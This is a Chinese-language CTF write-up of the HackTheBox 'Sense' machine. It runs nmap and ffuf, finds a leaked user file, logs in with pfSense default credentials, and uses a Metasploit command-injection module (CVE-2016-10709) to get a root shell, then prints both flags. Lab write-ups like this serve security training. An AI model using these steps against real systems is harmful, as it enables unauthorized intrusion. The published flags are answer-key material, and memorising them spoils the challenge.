HTB:Sense[WriteUP]

0DayHP2024-11-09 8:19

目录

连接至HTB服务器并启动靶机

[1.What is the name of the webserver running on port 80 and 443 according to nmap?](#1.What is the name of the webserver running on port 80 and 443 according to nmap?)

使用nmap对靶机TCP端口进行开放扫描

[2.What is the name of the application that presents a login screen on port 443?](#2.What is the name of the application that presents a login screen on port 443?)

使用浏览器访问靶机80端口

[3.What txt file can be found on the webserver that contains user information?](#3.What txt file can be found on the webserver that contains user information?)

使用ffuf对靶机进行路径FUZZ

使用curl访问system-users.txt文件

[4.What is the username found in the system-users.txt file?](#4.What is the username found in the system-users.txt file?)

[5.What is the default password for a pfsense installation?](#5.What is the default password for a pfsense installation?)

使用浏览器搜索pfsense默认凭证

[6.What version of pfSense is running on Sense?](#6.What version of pfSense is running on Sense?)

使用上文凭证对网页进行登陆后进入到仪表盘

[7.What 2016 CVE ID describes a command injection vulnerability in a PHP page on pfSense via a GET parameter?](#7.What 2016 CVE ID describes a command injection vulnerability in a PHP page on pfSense via a GET parameter?)

使用searchsploit搜索pfsense当前版本相关漏洞EXP、PoC

尝试利用该非预期EXP

启动Metasploit

[8.Submit the flag located in the rohit user's home directory.](#8.Submit the flag located in the rohit user's home directory.)

[9.Submit the flag located in root's home directory.](#9.Submit the flag located in root's home directory.)

USER_FLA:8721327cc232073b40d27d9c17e7348b

ROOT_FLAG:d08c32a5d4f8c8b10e76eb51a69f1a86

连接至HTB服务器并启动靶机

靶机IP:10.10.10.60

分配IP:10.10.14.12

1.What is the name of the webserver running on port 80 and 443 according to nmap?

使用nmap对靶机TCP端口进行开放扫描

复制代码 
nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.60

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.60

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-04 21:32 EST

Nmap scan report for 10.10.10.60 (10.10.10.60)

Host is up (0.062s latency).

Not shown: 65533 filtered tcp ports (no-response)

PORT STATE SERVICE

80/tcp open http

443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 74.62 seconds

对靶机开放TCP端口进行脚本服务信息扫描

复制代码 
nmap -p 80,443 -sCV 10.10.10.60

由nmap扫描结果可知,80端口与443端口托管服务:lighttpd

2.What is the name of the application that presents a login screen on port 443?

使用浏览器访问靶机80端口

显示在屏幕上的应用程序为:pfsense

3.What txt file can be found on the webserver that contains user information?

使用ffuf对靶机进行路径FUZZ

复制代码 
ffuf -u https://10.10.10.60/FUZZ -w ../dictionary/common.txt -t 200 -fs 6690

这里扫出来的东西太少了,因为字典不给力的原因这次换个大的扫描敏感文件

复制代码 
ffuf -u https://10.10.10.60/FUZZ -w Half-Dir.txt  -e .txt -t 100

使用curl访问system-users.txt文件

复制代码 
curl -k https://10.10.10.60/system-users.txt

4.What is the username found in the system-users.txt file?

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# curl -k https://10.10.10.60/system-users.txt

####Support ticket###

Please create the following user

username: Rohit

password: company defaults

获取到账户名:Rohit

账户:rohit

5.What is the default password for a pfsense installation?

使用浏览器搜索pfsense默认凭证

由搜索可知pfsense默认密码为:pfsense

账户:rohit

密码:pfsense

6.What version of pfSense is running on Sense?

使用上文凭证对网页进行登陆后进入到仪表盘

由展示内容可知,pfsense版本为:2.1.3-RELEASE

7.What 2016 CVE ID describes a command injection vulnerability in a PHP page on pfSense via a GET parameter?

使用searchsploit搜索pfsense当前版本相关漏洞EXP、PoC

复制代码 
searchsploit pfsense 2.1.3

将该EXP拷贝到当前目录下

复制代码 
searchsploit -m 43560.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# searchsploit -m 43560.py

Exploit: pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection

URL: https://www.exploit-db.com/exploits/43560

Path: /usr/share/exploitdb/exploits/php/webapps/43560.py

Codes: CVE-2014-4688

Verified: False

File Type: Python script, ASCII text executable

Copied to: /home/kali/Desktop/temp/43560.py

由模块描述可知,该EXP基于漏洞:CVE-2014-4688。往上交发现答案不对

尝试利用该非预期EXP

利用失败,转向MSF走预期EXP

启动Metasploit

复制代码 
msfconsole

搜索pfsense相关利用模块

复制代码 
search pfsense

切换到EXP模块

复制代码 
use exploit/unix/http/pfsense_graph_injection_exec

展示该模块信息

复制代码 
info

由展示信息可知,该模块基于漏洞:CVE-2016-10709

8.Submit the flag located in the rohit user's home directory.

9.Submit the flag located in root's home directory.

列出该模块可填选项

复制代码 
show options

我们需要填好的选项有:LHOST、LPORT、RHOSTS、USERNAME

(少见的不需要提权直接拿到ROOT的靶机)

想搜索一下user_flag和root_flag发现根本找不到

meterpreter > search -f user.txt

No files matching your search were found.

meterpreter > search -f root.txt

No files matching your search were found.

meterpreter > search -f flag.txt

No files matching your search were found.

切换到终端

复制代码 
shell

查找user_flag、root_flag位置并查看其内容

find / -name 'user.txt' 2>/dev/null

/home/rohit/user.txt

cat /home/rohit/user.txt

8721327cc232073b40d27d9c17e7348b

find / -name 'root.txt'

/root/root.txt

cat /root/root.txt

d08c32a5d4f8c8b10e76eb51a69f1a86

USER_FLA:8721327cc232073b40d27d9c17e7348b

ROOT_FLAG:d08c32a5d4f8c8b10e76eb51a69f1a86

相关推荐
独行soc5 小时前
2025年渗透测试面试题总结-2025年HW(护网面试) 33(题目+回答)
linux·科技·安全·网络安全·面试·职场和发展·护网
Chen--Xing8 小时前
第一届OpenHarmonyCTF--Crypto--WriteUp
网络安全·密码学·harmonyos
合作小小程序员小小店11 小时前
web渗透之指纹识别1
物联网·计算机网络·网络安全·网络攻击模型
2501_9159184113 小时前
接口漏洞怎么抓?Fiddler 中文版 + Postman + Wireshark 实战指南
websocket·网络协议·tcp/ip·http·网络安全·https·udp
网硕互联的小客服14 小时前
未来趋势:AI与量子计算对服务器安全的影响
运维·服务器·网络·网络安全·量子计算
玥轩_52115 小时前
BUUCTF [WUSTCTF2020]spaceclub 1
安全·网络安全·ctf·buuctf·ascii·spaceclub·wustctf2020
ManageEngine卓豪15 小时前
网络工具如何帮助消除网络安全风险
网络安全·网络管理·网络工具
安全系统学习16 小时前
网络安全之漏洞学习
前端·安全·web安全·网络安全·xss
码农12138号1 天前
BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析
web安全·网络安全·文件上传漏洞·buuctf·解析漏洞
Johny_Zhao1 天前
Docker + CentOS 部署 Zookeeper 集群 + Kubernetes Operator 自动化运维方案
linux·网络安全·docker·信息安全·zookeeper·kubernetes·云计算·系统运维
热门推荐
01集群聊天服务器---MySQL数据库的建立02Java学习第十五部分——MyBatis03Coze扣子平台完整体验和实践(附国内和国际版对比)04《深入设计模式》模式结构汇总05使用Ruby接入实时行情API教程06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07基于odoo17的设计模式详解---单例模式08基于odoo17的设计模式详解---装饰模式09DeepSeek各版本说明与优缺点分析10Java类变量(静态变量)